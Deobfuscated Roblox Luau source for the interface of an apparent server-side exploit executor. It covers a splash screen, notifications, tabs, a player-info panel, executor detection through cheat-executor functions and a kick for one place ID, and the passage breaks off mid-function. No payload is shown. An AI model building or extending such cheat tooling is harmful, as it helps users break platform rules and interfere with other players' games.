-- deobf by worriedBr4 -- say thanks to ur king local kickPlaceId = 74918992335762 local player = game:GetService("Players").LocalPlayer if game.PlaceId == kickPlaceId then player:Kick("i hate it place...") end local function DeleteMyGUI() local CoreGui = game:GetService("CoreGui") local PlayerGui = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui") local targetGUI = "super big olimen oh hell fucking no" local found = false for _, item in pairs(CoreGui:GetChildren()) do if item:IsA("ScreenGui") and item.Name == targetGUI then item:Destroy() found = true end end for _, item in pairs(PlayerGui:GetChildren()) do if item:IsA("ScreenGui") and item.Name == targetGUI then item:Destroy() found = true end end for _, item in pairs(CoreGui:GetDescendants()) do if item:IsA("ScreenGui") and item.Name == targetGUI then item:Destroy() found = true end end return found end local function AdvancedDelete() local CoreGui = game:GetService("CoreGui") local targetName = "super big olimen oh hell fucking no" local foundGUI = CoreGui:FindFirstChild(targetName) if foundGUI and foundGUI:IsA("ScreenGui") then foundGUI:Destroy() return end end local function NuclearOption() local CoreGui = game:GetService("CoreGui") local targetName = "super big olimen oh hell fucking no" for _, gui in pairs(CoreGui:GetChildren()) do if gui:IsA("ScreenGui") and gui.Name == targetName then gui:Destroy() end end end DeleteMyGUI() AdvancedDelete() NuclearOption() local TweenService = game:GetService("TweenService") local luauxV5 = Instance.new("ScreenGui") luauxV5.Name = "super big olimen oh hell fucking no" luauxV5.IgnoreGuiInset = true luauxV5.ResetOnSpawn = false luauxV5.Parent = game:GetService("CoreGui") local Frame = Instance.new("Frame") Frame.AnchorPoint = Vector2.new(0.5, 0.5) Frame.Position = UDim2.new(0.5, 0, 0.5, 0) Frame.Size = UDim2.new(0, 630, 0, 262.99) Frame.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Frame.BackgroundTransparency = 0.25 Frame.BorderSizePixel = 1 Frame.BorderColor3 = Color3.fromRGB(20, 20, 20) Frame.Parent = luauxV5 local Corner = Instance.new("UICorner") Corner.CornerRadius = UDim.new(0, 10) Corner.Parent = Frame local UIStroke = Instance.new("UIStroke") UIStroke.Thickness = 2 UIStroke.Transparency = 0 UIStroke.Parent = Frame local Circle = Instance.new("ImageLabel") Circle.AnchorPoint = Vector2.new(1, 0.5) Circle.Position = UDim2.new(0.45, -10, 0.45, 0) Circle.Size = UDim2.new(0, 180, 0, 180) Circle.BackgroundTransparency = 1 Circle.Image = "rbxassetid://80990588449079" Circle.ImageTransparency = 1 Circle.Parent = Frame local Button = Instance.new("TextButton") Button.Size = UDim2.new(0, 150, 0, 40) Button.Position = UDim2.new(0.5, -70, 0.05, 0) Button.Text = "Toggle Ui" Button.Parent = luauxV5 Button.BackgroundTransparency = 0.35 Button.AutoButtonColor = false local Corner = Instance.new("UICorner") Corner.CornerRadius = UDim.new(0, 5) Button.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Button.TextColor3 = Color3.fromRGB(255, 255, 255) Corner.Parent = Button Button.Visible = false local Title = Instance.new("TextLabel") Title.AnchorPoint = Vector2.new(0, 0.5) Title.Position = UDim2.new(0.45, 10, 0.4, 0) Title.Size = UDim2.new(0.5, 0, 0.2, 0) Title.BackgroundTransparency = 1 Title.Font = Enum.Font.GothamBold Title.Text = "luau ss, bro its bad" Title.TextColor3 = Color3.fromRGB(255, 255, 255) Title.TextTransparency = 1 Title.TextScaled = true Title.Parent = Frame local Subtitle = Instance.new("TextLabel") Subtitle.AnchorPoint = Vector2.new(0, 0) Subtitle.Position = UDim2.new(0.46, 10, 0.55, 0) Subtitle.Size = UDim2.new(0.5, 0, 0.1, 0) Subtitle.BackgroundTransparency = 1 Subtitle.Font = Enum.Font.Gotham Subtitle.Text = "by gojohdkaisenkt" Subtitle.TextColor3 = Color3.fromRGB(200, 200, 200) Subtitle.TextTransparency = 1 Subtitle.TextScaled = true Subtitle.Parent = Frame local Version = Instance.new("TextLabel") Version.AnchorPoint = Vector2.new(1, 1) Version.Position = UDim2.new(0.98, 0, 0.95, 0) Version.Size = UDim2.new(0.3, 0, 0.1, 0) Version.BackgroundTransparency = 1 Version.Font = Enum.Font.Gotham Version.Text = "Beta 5.1" Version.TextColor3 = Color3.fromRGB(220, 220, 220) Version.TextTransparency = 1 Version.TextScaled = true Version.TextXAlignment = Enum.TextXAlignment.Right Version.Parent = Frame TweenService:Create(Circle, TweenInfo.new(1), {ImageTransparency = 0}):Play() TweenService:Create(Title, TweenInfo.new(1), {TextTransparency = 0}):Play() TweenService:Create(Subtitle, TweenInfo.new(1), {TextTransparency = 0}):Play() TweenService:Create(Version, TweenInfo.new(1), {TextTransparency = 0}):Play() pcall(function() task.spawn(function() while Circle.Parent and Circle.Visible do Circle.Rotation = (Circle.Rotation + 5) % 360 task.wait(0.03) end end) end) wait(4) pcall(function() TweenService:Create(Circle, TweenInfo.new(1), {ImageTransparency = 1}):Play() TweenService:Create(Title, TweenInfo.new(1), {TextTransparency = 1}):Play() TweenService:Create(Subtitle, TweenInfo.new(1), {TextTransparency = 1}):Play() TweenService:Create(Version, TweenInfo.new(1), {TextTransparency = 1}):Play() end) wait(1) pcall(function() TweenService:Create(Frame, TweenInfo.new(1, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { Size = UDim2.new(0, 722, 0, 308.9) }):Play() end) local function QFCS_fake_script() local script = Instance.new('LocalScript', Frame) local UIS = game:GetService("UserInputService") function dragify(Frame) dragToggle = nil local dragSpeed = -1 dragInput = nil dragStart = nil local dragPos = nil function updateInput(input) local Delta = input.Position - dragStart local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y) game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.5), {Position = Position}):Play() end Frame.InputBegan:Connect(function(input) if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then dragToggle = true dragStart = input.Position startPos = Frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragToggle = false end end) end end) Frame.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) game:GetService("UserInputService").InputChanged:Connect(function(input) if input == dragInput and dragToggle then updateInput(input) end end) end dragify(script.Parent) end coroutine.wrap(QFCS_fake_script)() local UIStroke = Instance.new("UIStroke") UIStroke.Thickness = 1 UIStroke.Transparency = 0 UIStroke.Parent = Frame pcall(function() local toggletab = "rbxassetid://112941463599795" local offtab = "rbxassetid://109863274414818" local script = "rbxassetid://116592854241448" local home = "rbxassetid://11347112400" local Setting = "rbxassetid://14134158045" local X = "rbxassetid://112774396559653" local logo = "rbxassetid://123145425569096" local admin = "rbxassetid://5183840354" local game = "rbxassetid://94219228196230" local execute = "rbxassetid://84159029790324" local scanner = "rbxassetid://99625725727957" local Clear = "rbxassetid://105955025341798" local Error = "rbxassetid://51071540" local success = "rbxassetid://82668563249216" local WARNING = "rbxassetid://85147473315465" local jumpscare = "rbxassetid://106510700539466" local Skybox = "rbxassetid://106510700539466" local localface = "rbxassetid://96074603352531" local discord = "rbxassetid://94434236999817" local decal = "rbxassetid://123694661930746" local player = game.Players.LocalPlayer.Name end) pcall(function() pcall(function() pcall(function() end) end) end) local ErrorIcon = "rbxassetid://5107154082" local SuccessIcon = "rbxassetid://82668563249216" local WarningIcon = "rbxassetid://85147473315465" local Players = game:GetService("Players") local TweenService = game:GetService("TweenService") local TextService = game:GetService("TextService") local WIDTH = 300 local LEFT_OFFSET = 60 local MIN_HEIGHT = 70 local TITLE_HEIGHT = 20 local DESC_TOP = 30 local BOTTOM_PADDING = 12 local BAR_HEIGHT = 4 local guiParent = game:FindFirstChild("CoreGui") or Players.LocalPlayer:WaitForChild("PlayerGui") local ScreenGui = Instance.new("ScreenGui") ScreenGui.Name = "NotificationGui" ScreenGui.ResetOnSpawn = false ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling ScreenGui.Parent = guiParent local Holder = Instance.new("Frame") Holder.Name = "Holder" Holder.Size = UDim2.new(0, WIDTH, 1, -40) Holder.Position = UDim2.new(1, -(WIDTH + 10), 1, -20) Holder.AnchorPoint = Vector2.new(0, 1) Holder.BackgroundTransparency = 1 Holder.Parent = ScreenGui local UIListLayout = Instance.new("UIListLayout") UIListLayout.Padding = UDim.new(0, 6) UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Right UIListLayout.VerticalAlignment = Enum.VerticalAlignment.Bottom UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout.Parent = Holder local function getWrappedTextHeight(text, textSize, font, availableWidth) local bounds = TextService:GetTextSize(text or "", textSize, font, Vector2.new(availableWidth, math.huge)) return math.ceil(bounds.Y) end local function CreateNotification(title, msg, kind, duration) duration = duration or 5 kind = (kind == "Error" or kind == "Warning" or kind == "Success") and kind or "Success" local notif = Instance.new("Frame") notif.Name = "Notif" notif.Size = UDim2.new(0, WIDTH, 0, 0) notif.BackgroundColor3 = Color3.fromRGB(30, 30, 30) notif.BackgroundTransparency = 0.1 notif.BorderSizePixel = 0 notif.ClipsDescendants = true notif.Parent = Holder notif.LayoutOrder = -os.clock() local stroke = Instance.new("UIStroke") stroke.Thickness = 2 stroke.Color = Color3.fromRGB(20, 20, 20) stroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border stroke.Parent = notif local corner = Instance.new("UICorner") corner.CornerRadius = UDim.new(0, 10) corner.Parent = notif local icon = Instance.new("ImageLabel") icon.Size = UDim2.new(0, 40, 0, 40) icon.Position = UDim2.new(0, 10, 0, 15) icon.BackgroundTransparency = 1 icon.Parent = notif icon.Image = (kind == "Error" and ErrorIcon) or (kind == "Warning" and WarningIcon) or SuccessIcon local titleL = Instance.new("TextLabel") titleL.Size = UDim2.new(1, -LEFT_OFFSET, 0, TITLE_HEIGHT) titleL.Position = UDim2.new(0, LEFT_OFFSET, 0, 10) titleL.BackgroundTransparency = 1 titleL.Text = title or "" titleL.TextColor3 = Color3.fromRGB(255, 255, 255) titleL.Font = Enum.Font.GothamBold titleL.TextSize = 14 titleL.TextXAlignment = Enum.TextXAlignment.Left titleL.Parent = notif local desc = Instance.new("TextLabel") desc.Size = UDim2.new(1, -LEFT_OFFSET, 0, 0) desc.Position = UDim2.new(0, LEFT_OFFSET, 0, DESC_TOP) desc.BackgroundTransparency = 1 desc.Text = msg or "" desc.TextColor3 = Color3.fromRGB(200, 200, 200) desc.Font = Enum.Font.Gotham desc.TextSize = 13 desc.TextWrapped = true desc.TextXAlignment = Enum.TextXAlignment.Left desc.TextYAlignment = Enum.TextYAlignment.Top desc.Parent = notif local availableWidth = WIDTH - LEFT_OFFSET - 10 local descH = getWrappedTextHeight(desc.Text, desc.TextSize, desc.Font, availableWidth) desc.Size = UDim2.new(1, -LEFT_OFFSET, 0, descH) local needH = math.max(MIN_HEIGHT, DESC_TOP + descH + BOTTOM_PADDING) local timeBar = Instance.new("Frame") timeBar.Size = UDim2.new(1, 0, 0, BAR_HEIGHT) timeBar.Position = UDim2.new(0, 0, 1, -BAR_HEIGHT) timeBar.BackgroundColor3 = Color3.fromRGB(0, 170, 255) timeBar.BorderSizePixel = 0 timeBar.Parent = notif local barCorner = Instance.new("UICorner") barCorner.CornerRadius = UDim.new(1, 0) barCorner.Parent = timeBar local s = Instance.new("Sound") s.SoundId = "rbxassetid://4590657391" s.Volume = 1 s.Parent = notif s:Play() TweenService:Create( notif, TweenInfo.new(0.2, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { Size = UDim2.new(0, WIDTH, 0, needH) } ):Play() TweenService:Create( timeBar, TweenInfo.new(duration, Enum.EasingStyle.Linear, Enum.EasingDirection.Out), { Size = UDim2.new(0, 0, 0, BAR_HEIGHT) } ):Play() task.delay(duration, function() TweenService:Create( notif, TweenInfo.new(0.2, Enum.EasingStyle.Quad, Enum.EasingDirection.In), { Size = UDim2.new(0, WIDTH, 0, 0) } ):Play() task.wait(0.22) notif:Destroy() end) end CreateNotification("Success!", "load success, welcome to bad ss", "Success", 5) local f = Instance.new("Frame") f.Size = UDim2.new(1, 0, 0.14, 0) f.BackgroundColor3 = Color3.fromRGB(20, 20, 20) f.BackgroundTransparency = 0.99 f.BorderSizePixel = 2 f.BorderColor3 = Color3.fromRGB(20, 20, 20) f.Parent = Frame local Corner = Instance.new("UICorner") Corner.CornerRadius = UDim.new(0, 10) Corner.Parent = f local Subtitl = Instance.new("TextLabel") Subtitl.Position = UDim2.new(0.06, 0, 0, 0) Subtitl.Size = UDim2.new(0.5, 0, 0.1, 0) Subtitl.BackgroundTransparency = 1 Subtitl.Font = Enum.Font.Gotham Subtitl.Text = "luau x SS V5.1 | deobf by worriedBr4" Subtitl.TextColor3 = Color3.fromRGB(255, 255, 255) Subtitl.TextTransparency = 0 Subtitl.TextScaled = true Subtitl.Parent = Frame local img = Instance.new("ImageLabel") img.Size = UDim2.new(0, 40, 0, 50) img.Position = UDim2.new(0, 5, 0.5, -20) img.BackgroundTransparency = 1 img.Image = "rbxassetid://123145425569096" img.Parent = f local aspect = Instance.new("UIAspectRatioConstraint") aspect.AspectRatio = 1.2 aspect.Parent = img local toggle = Instance.new("TextButton") toggle.Size = UDim2.new(0, 35, 0, 35) toggle.Position = UDim2.new(0.943, 0, 0.01, 0) toggle.BackgroundColor3 = Color3.fromRGB(20, 20, 20) toggle.TextColor3 = Color3.fromRGB(255, 255, 255) toggle.Font = Enum.Font.GothamBold toggle.Parent = Frame toggle.Text = "X" toggle.TextSize = 35 toggle.BorderSizePixel = 1 toggle.BorderColor3 = Color3.fromRGB(0, 0, 0) local corner = Instance.new("UICorner") corner.CornerRadius = UDim.new(0, 10) corner.Parent = toggle toggle.BackgroundTransparency = 0.9 local aspect = Instance.new("UIAspectRatioConstraint") aspect.AspectRatio = 1 aspect.Parent = icon local UIStroke = Instance.new("UIStroke") UIStroke.Thickness = 1 UIStroke.Transparency = 0 UIStroke.Parent = toggle UIStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border pcall(function() toggle.MouseButton1Down:connect(function() TweenService:Create(Frame, TweenInfo.new(1.5), {BackgroundTransparency = 1}):Play() wait(1) Frame.Visible = false Button.Visible = true end) end) Button.MouseButton1Down:connect(function() Button.Visible = false Frame.Visible = true TweenService:Create(Frame, TweenInfo.new(1.5), {BackgroundTransparency = 0.25}):Play() end) local TweenService = game:GetService("TweenService") local UserInputService = game:GetService("UserInputService") local TweenService = game:GetService("TweenService") local UserInputService = game:GetService("UserInputService") local Scroll = Instance.new("ScrollingFrame") Scroll.Size = UDim2.new(0, 55, 0.82, 0) Scroll.Position = UDim2.new(0.005, 1, 0.16, -0.9) Scroll.CanvasSize = UDim2.new(0, 0, 0, 0) Scroll.ScrollBarThickness = 0 Scroll.ScrollingDirection = Enum.ScrollingDirection.Y Scroll.BackgroundTransparency = 1 Scroll.Parent = Frame Scroll.ClipsDescendants = false local UIListLayout = Instance.new("UIListLayout") UIListLayout.Parent = Scroll UIListLayout.Padding = UDim.new(0, 5) UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function() Scroll.CanvasSize = UDim2.new(0, 0, 0, UIListLayout.AbsoluteContentSize.Y) end) local tweenInfo = TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out) local targetPosition = Scroll.CanvasPosition UserInputService.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseWheel then targetPosition = targetPosition + Vector2.new(0, -input.Position.Z * 50) elseif input.UserInputType == Enum.UserInputType.Touch and input.UserInputState == Enum.UserInputState.Change then targetPosition = targetPosition - Vector2.new(0, input.Delta.Y * 3) end targetPosition = Vector2.new( 0, math.clamp(targetPosition.Y, 0, math.max(0, Scroll.CanvasSize.Y.Offset - Scroll.AbsoluteWindowSize.Y)) ) TweenService:Create(Scroll, tweenInfo, {CanvasPosition = targetPosition}):Play() end) local btn1 = Instance.new("TextButton") btn1.Size = UDim2.new(0, 40, 0, 40) btn1.Position = UDim2.new(0, 0, 0, 0) btn1.BackgroundColor3 = Color3.fromRGB(20, 20, 20) btn1.Text = "" btn1.TextSize = 0 btn1.Parent = Scroll btn1.BorderSizePixel = 1 btn1.BorderColor3 = Color3.fromRGB(0, 0, 0) btn1.BackgroundTransparency = 0.9 local corner1 = Instance.new("UICorner") corner1.CornerRadius = UDim.new(0, 10) corner1.Parent = btn1 local aspect1 = Instance.new("UIAspectRatioConstraint") aspect1.AspectRatio = 1 aspect1.Parent = btn1 local stroke1 = Instance.new("UIStroke") stroke1.Thickness = 1 stroke1.Transparency = 0 stroke1.ApplyStrokeMode = Enum.ApplyStrokeMode.Border stroke1.Parent = btn1 local icon1 = Instance.new("ImageLabel") icon1.Size = UDim2.new(0.7, 0, 0.7, 0) icon1.Position = UDim2.new(0.15, 0, 0.15, 0) icon1.BackgroundTransparency = 1 icon1.Image = "rbxassetid://11347112400" icon1.Parent = btn1 local icorner1 = Instance.new("UICorner") icorner1.CornerRadius = UDim.new(0, 8) icorner1.Parent = icon1 local btn2 = Instance.new("TextButton") btn2.Size = UDim2.new(0, 40, 0, 40) btn2.Position = UDim2.new(0, 50, 0, 0) btn2.BackgroundColor3 = Color3.fromRGB(20, 20, 20) btn2.Text = "" btn2.TextSize = 0 btn2.Parent = Scroll btn2.BorderSizePixel = 1 btn2.BorderColor3 = Color3.fromRGB(0, 0, 0) btn2.BackgroundTransparency = 0.9 local corner2 = Instance.new("UICorner") corner2.CornerRadius = UDim.new(0, 10) corner2.Parent = btn2 local aspect2 = Instance.new("UIAspectRatioConstraint") aspect2.AspectRatio = 1 aspect2.Parent = btn2 local stroke2 = Instance.new("UIStroke") stroke2.Thickness = 1 stroke2.Transparency = 0 stroke2.ApplyStrokeMode = Enum.ApplyStrokeMode.Border stroke2.Parent = btn2 local icon2 = Instance.new("ImageLabel") icon2.Size = UDim2.new(0.7, 0, 0.7, 0) icon2.Position = UDim2.new(0.15, 0, 0.15, 0) icon2.BackgroundTransparency = 1 icon2.Image = "rbxassetid://116592854241448" icon2.Parent = btn2 local icorner2 = Instance.new("UICorner") icorner2.CornerRadius = UDim.new(0, 8) icorner2.Parent = icon2 local btn3 = Instance.new("TextButton") btn3.Size = UDim2.new(0, 40, 0, 40) btn3.Position = UDim2.new(0, 100, 0, 0) btn3.BackgroundColor3 = Color3.fromRGB(20, 20, 20) btn3.Text = "" btn3.TextSize = 0 btn3.Parent = Scroll btn3.BorderSizePixel = 1 btn3.BorderColor3 = Color3.fromRGB(0, 0, 0) btn3.BackgroundTransparency = 0.9 local corner3 = Instance.new("UICorner") corner3.CornerRadius = UDim.new(0, 10) corner3.Parent = btn3 local aspect3 = Instance.new("UIAspectRatioConstraint") aspect3.AspectRatio = 1 aspect3.Parent = btn3 local stroke3 = Instance.new("UIStroke") stroke3.Thickness = 1 stroke3.Transparency = 0 stroke3.ApplyStrokeMode = Enum.ApplyStrokeMode.Border stroke3.Parent = btn3 local icon3 = Instance.new("ImageLabel") icon3.Size = UDim2.new(0.7, 0, 0.7, 0) icon3.Position = UDim2.new(0.15, 0, 0.15, 0) icon3.BackgroundTransparency = 1 icon3.Image = "rbxassetid://11570895459" icon3.Parent = btn3 local icorner3 = Instance.new("UICorner") icorner3.CornerRadius = UDim.new(0, 8) icorner3.Parent = icon3 local btn4 = Instance.new("TextButton") btn4.Size = UDim2.new(0, 40, 0, 40) btn4.Position = UDim2.new(0, 150, 0, 0) btn4.BackgroundColor3 = Color3.fromRGB(20, 20, 20) btn4.Text = "" btn4.TextSize = 0 btn4.Parent = Scroll btn4.BorderSizePixel = 1 btn4.BorderColor3 = Color3.fromRGB(0, 0, 0) btn4.BackgroundTransparency = 0.9 local corner4 = Instance.new("UICorner") corner4.CornerRadius = UDim.new(0, 10) corner4.Parent = btn4 local aspect4 = Instance.new("UIAspectRatioConstraint") aspect4.AspectRatio = 1 aspect4.Parent = btn4 local stroke4 = Instance.new("UIStroke") stroke4.Thickness = 1 stroke4.Transparency = 0 stroke4.ApplyStrokeMode = Enum.ApplyStrokeMode.Border stroke4.Parent = btn4 local icon4 = Instance.new("ImageLabel") icon4.Size = UDim2.new(0.7, 0, 0.7, 0) icon4.Position = UDim2.new(0.15, 0, 0.15, 0) icon4.BackgroundTransparency = 1 icon4.Image = "rbxassetid://16069233190" icon4.Parent = btn4 local icorner4 = Instance.new("UICorner") icorner4.CornerRadius = UDim.new(0, 8) icorner4.Parent = icon4 local btn7 = Instance.new("TextButton") btn7.Size = UDim2.new(0, 40, 0, 40) btn7.Position = UDim2.new(0, 300, 0, 0) btn7.BackgroundColor3 = Color3.fromRGB(20, 20, 20) btn7.Text = "" btn7.TextSize = 0 btn7.Parent = Scroll btn7.BorderSizePixel = 1 btn7.BorderColor3 = Color3.fromRGB(0, 0, 0) btn7.BackgroundTransparency = 0.9 local corner7 = Instance.new("UICorner") corner7.CornerRadius = UDim.new(0, 10) corner7.Parent = btn7 local aspect7 = Instance.new("UIAspectRatioConstraint") aspect7.AspectRatio = 1 aspect7.Parent = btn7 local stroke7 = Instance.new("UIStroke") stroke7.Thickness = 1 stroke7.Transparency = 0 stroke7.ApplyStrokeMode = Enum.ApplyStrokeMode.Border stroke7.Parent = btn7 local icon7 = Instance.new("ImageLabel") icon7.Size = UDim2.new(0.7, 0, 0.7, 0) icon7.Position = UDim2.new(0.15, 0, 0.15, 0) icon7.BackgroundTransparency = 1 icon7.Image = "rbxassetid://14134158045" icon7.Parent = btn7 local icorner7 = Instance.new("UICorner") icorner7.CornerRadius = UDim.new(0, 8) icorner7.Parent = icon7 local TweenService = game:GetService("TweenService") local activeBtn = nil local function PlayEffect(btn) if activeBtn == btn then return end if activeBtn then local oldStroke = activeBtn:FindFirstChild("UIStroke") if oldStroke then TweenService:Create(oldStroke, TweenInfo.new(0.3), { Color = Color3.fromRGB(20,20,20) }):Play() end end activeBtn = btn local grow = TweenService:Create(btn, TweenInfo.new(0.5, Enum.EasingStyle.Back, Enum.EasingDirection.Out), { Size = UDim2.new(0, btn.Size.X.Offset + 2, 0, btn.Size.Y.Offset + 2) }) local shrink = TweenService:Create(btn, TweenInfo.new(0.5, Enum.EasingStyle.Back, Enum.EasingDirection.In), { Size = UDim2.new(0, btn.Size.X.Offset, 0, btn.Size.Y.Offset) }) local stroke = btn:FindFirstChild("UIStroke") if stroke then TweenService:Create(stroke, TweenInfo.new(1), { Color = Color3.fromRGB(0, 0, 180) }):Play() end end btn2.MouseButton1Click:Connect(function() PlayEffect(btn2) end) btn1.MouseButton1Click:Connect(function() PlayEffect(btn1) end) local function myScript() PlayEffect(btn1) end spawn(myScript) btn3.MouseButton1Click:Connect(function() PlayEffect(btn3) end) btn4.MouseButton1Click:Connect(function() PlayEffect(btn4) end) btn7.MouseButton1Click:Connect(function() PlayEffect(btn7) end) btn1.AutoButtonColor = false btn2.AutoButtonColor = false btn3.AutoButtonColor = false btn4.AutoButtonColor = false btn7.AutoButtonColor = false local Line = Instance.new("TextLabel") Line.Size = UDim2.new(1, 0, 0, 2) Line.Position = UDim2.new(0, 0, 1, -1.678) Line.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Line.BorderSizePixel = 0 Line.Text = "" Line.Parent = f local l = Instance.new("Frame") l.Position = UDim2.new(0.5, 0, 0.6, 0) l.Size = UDim2.new(0.92, 0, 0.8489, 0) l.BackgroundColor3 = Color3.fromRGB(20, 20, 20) l.BackgroundTransparency = 0.99 l.BorderSizePixel = 1 Frame.BorderColor3 = Color3.fromRGB(20, 20, 20) l.Parent = Frame local Corner = Instance.new("UICorner") l.AnchorPoint = Vector2.new(0.46, 0.53) Corner.CornerRadius = UDim.new(0, 10) Corner.Parent = l local UIStroke = Instance.new("UIStroke") UIStroke.Thickness = 2 UIStroke.Transparency = 0 UIStroke.Parent = l l.ClipsDescendants = true local Stats = game:GetService("Stats") local Players = game:GetService("Players") local Player = Players.LocalPlayer local RunService = game:GetService("RunService") local MainFrame = Instance.new("Frame") MainFrame.Position = UDim2.new(15, 0, 0, 80) MainFrame.Size = UDim2.new(0, 666.9, 0, 262.99) MainFrame.BackgroundColor3 = Color3.fromRGB(15, 15, 15) MainFrame.BackgroundTransparency = 0 MainFrame.BorderSizePixel = 0 MainFrame.Parent = l Instance.new("UICorner", MainFrame).CornerRadius = UDim.new(0,12) do local g = Instance.new("UIGradient") g.Color = ColorSequence.new( Color3.fromRGB(20,20,20), Color3.fromRGB(90,0,120) ) g.Rotation = 90 g.Parent = MainFrame end local Avatar = Instance.new("ImageLabel") Avatar.Size = UDim2.new(0,80,0,80) Avatar.Position = UDim2.new(0,20,0,20) Avatar.BackgroundTransparency = 1 Avatar.Image = "rbxthumb://type=AvatarHeadShot&id="..Player.UserId.."&w=150&h=150" Avatar.Parent = MainFrame local PlayerInfo = Instance.new("TextLabel") PlayerInfo.Size = UDim2.new(0,550,0,40) PlayerInfo.Position = UDim2.new(0,120,0,20) PlayerInfo.BackgroundTransparency = 1 PlayerInfo.Font = Enum.Font.GothamBold PlayerInfo.TextSize = 20 PlayerInfo.TextColor3 = Color3.new(1,1,1) PlayerInfo.TextXAlignment = Enum.TextXAlignment.Left PlayerInfo.Text = "Hello, "..Player.Name PlayerInfo.Parent = MainFrame local SubInfo = Instance.new("TextLabel") SubInfo.Size = UDim2.new(0,550,0,20) SubInfo.Position = UDim2.new(0,120,0,55) SubInfo.BackgroundTransparency = 1 SubInfo.Font = Enum.Font.Gotham SubInfo.TextSize = 14 SubInfo.TextColor3 = Color3.fromRGB(200,200,200) SubInfo.TextXAlignment = Enum.TextXAlignment.Left SubInfo.Text = "UserId: "..Player.UserId.." • Age: "..Player.AccountAge.." days" SubInfo.Parent = MainFrame local function CreateBox(parent, pos, size, title, desc, c1, c2, rotation) local Box = Instance.new("Frame") Box.Size = size Box.Position = pos Box.BackgroundColor3 = Color3.fromRGB(25,25,25) Box.BackgroundTransparency = 0 Box.BorderSizePixel = 0 Box.Parent = parent Instance.new("UICorner", Box).CornerRadius = UDim.new(0,8) if c1 and c2 then local Grad = Instance.new("UIGradient") Grad.Color = ColorSequence.new(c1, c2) Grad.Rotation = rotation or 90 Grad.Parent = Box end local TitleLbl = Instance.new("TextLabel") TitleLbl.Size = UDim2.new(1,-10,0,20) TitleLbl.Position = UDim2.new(0,10,0,5) TitleLbl.BackgroundTransparency = 1 TitleLbl.Font = Enum.Font.GothamBold TitleLbl.TextSize = 16 TitleLbl.TextXAlignment = Enum.TextXAlignment.Left TitleLbl.TextColor3 = Color3.new(1,1,1) TitleLbl.Text = title TitleLbl.Parent = Box local DescLbl = Instance.new("TextLabel") DescLbl.Size = UDim2.new(1,-20,1,-30) DescLbl.Position = UDim2.new(0,10,0,25) DescLbl.BackgroundTransparency = 1 DescLbl.Font = Enum.Font.Gotham DescLbl.TextSize = 14 DescLbl.TextWrapped = true DescLbl.TextXAlignment = Enum.TextXAlignment.Left DescLbl.TextYAlignment = Enum.TextYAlignment.Top DescLbl.TextColor3 = Color3.fromRGB(220,220,220) DescLbl.Text = desc DescLbl.Parent = Box return DescLbl end local ServerBox = CreateBox( MainFrame, UDim2.new(0,20,0,110), UDim2.new(0,320,0,100), "Server", "Players, Ping, Region, Join Script...", Color3.fromRGB(20,20,20), Color3.fromRGB(0,160,140), 90 ) local ExecBox = CreateBox( MainFrame, UDim2.new(0,360,0,50), UDim2.new(0,320,0,80), "Wave", "Detecting Executor...", Color3.fromRGB(20,20,20), Color3.fromRGB(160,0,90), 90 ) local FriendsBox = CreateBox( MainFrame, UDim2.new(0,360,0,200), UDim2.new(0,320,0,50), "we care about you", "If you encounter any issues please let us know.", Color3.fromRGB(20,20,20), Color3.fromRGB(160,130,0), 90 ) RunService.RenderStepped:Connect(function() local dt = RunService.Heartbeat:Wait() local fps = math.floor(1/dt) local pingStat = Stats.Network.ServerStatsItem["Data Ping"] local ping = pingStat and math.floor(pingStat:GetValue()) or 0 ServerBox.Text = "Players: "..#Players:GetPlayers() .."\nPing: "..ping.."ms" .."\nFPS: "..fps .."\nRegion: US" .."\nPlaceId: "..game.PlaceId end) task.spawn(function() local exec = "ur executor so bad and not fucking not supported this function" if identifyexecutor then local name, ver = identifyexecutor() exec = name.." "..(ver or "") elseif getexecutorname then exec = getexecutorname() end ExecBox.Text = "Your executor: "..exec end) local Frame2 = Instance.new("Frame") Frame2.Size = UDim2.new(0, 666.9, 0, 262.99) Frame2.BackgroundColor3 = Color3.fromRGB(15, 15, 15) Frame2.BackgroundTransparency = 1 Frame2.BorderSizePixel = 0 Frame2.Parent = l local Frame3 = Instance.new("Frame") Frame3.Size = UDim2.new(0, 666.9, 0, 262.99) Frame3.BackgroundColor3 = Color3.fromRGB(15, 15, 15) Frame3.BackgroundTransparency = 1 Frame3.BorderSizePixel = 0 Frame3.Parent = l local Frame4 = Instance.new("Frame") Frame4.Parent = l Frame4.Size = UDim2.new(0, 666.9, 0, 262.99) Frame3.BackgroundColor3 = Color3.fromRGB(15, 15, 15) Frame4.BackgroundTransparency = 0.99 Frame4.BorderSizePixel = 0 Frame4.Parent = l local Frame5 = Instance.new("Frame") Frame5.Parent = l Frame5.Size = UDim2.new(0, 666.9, 0, 262.99) Frame5.BackgroundTransparency = 0.99 Frame4.BorderSizePixel = 0 Frame5.Parent = l local TweenService = game:GetService("TweenService") local Frames = {MainFrame, Frame2, Frame3, Frame4, Frame5} local ActivePos = UDim2.new(0, 0, -0.0007, 0) local HiddenPos = UDim2.new(2, 0, 0, 100) local function SlideTo(index) for i, frame in ipairs(Frames) do local targetPos if i == index then targetPos = ActivePos else targetPos = HiddenPos end TweenService:Create(frame, TweenInfo.new( 0.5, Enum.EasingStyle.Quint, Enum.EasingDirection.Out 